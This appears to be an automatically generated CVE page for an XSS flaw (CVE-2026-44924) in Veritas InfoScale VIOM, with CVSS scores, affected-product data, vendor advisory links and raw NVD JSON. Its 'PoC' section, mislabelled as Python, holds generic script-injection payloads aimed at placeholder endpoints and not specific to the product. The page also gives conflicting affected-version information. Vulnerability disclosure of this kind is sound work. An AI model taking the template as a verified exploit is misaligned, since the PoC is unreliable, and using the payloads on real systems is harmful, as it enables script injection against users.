Security Vulnerability Report
中文
CVE-2026-44924 CVSS 5.4 MEDIUM

CVE-2026-44924

Published: 2026-05-20 17:16:24
Last Modified: 2026-05-21 16:57:48

Description

InfoScale VIOM 9.1.3 allows XSS.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:veritas:infoscale_operations_manager:*:*:*:*:*:*:*:* - VULNERABLE
InfoScale VIOM 9.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-44924 (Reflected/Stored XSS) Target: Veritas InfoScale VIOM 9.1.3 --> <html> <body> <form action="http://target-viom-server:port/vulnerable_endpoint" method="POST"> <input type="hidden" name="vulnerable_param" value="<script>alert('XSS CVE-2026-44924')</script>" /> <input type="submit" value="Submit" /> </form> <script> // Automated simulation of the exploit // In a real scenario, an attacker would send this link to a victim var payload = encodeURIComponent("<img src=x onerror=alert('CVE-2026-44924')>"); var exploitUrl = "http://target-viom-server:port/vulnerable_endpoint?input=" + payload; console.log("Exploit URL: " + exploitUrl); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44924", "sourceIdentifier": "[email protected]", "published": "2026-05-20T17:16:24.130", "lastModified": "2026-05-21T16:57:47.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InfoScale VIOM 9.1.3 allows XSS."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:veritas:infoscale_operations_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.3", "matchCriteriaId": "6B9304E9-399B-40DD-B806-F8E540AE1A72"}]}]}], "references": [{"url": "https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}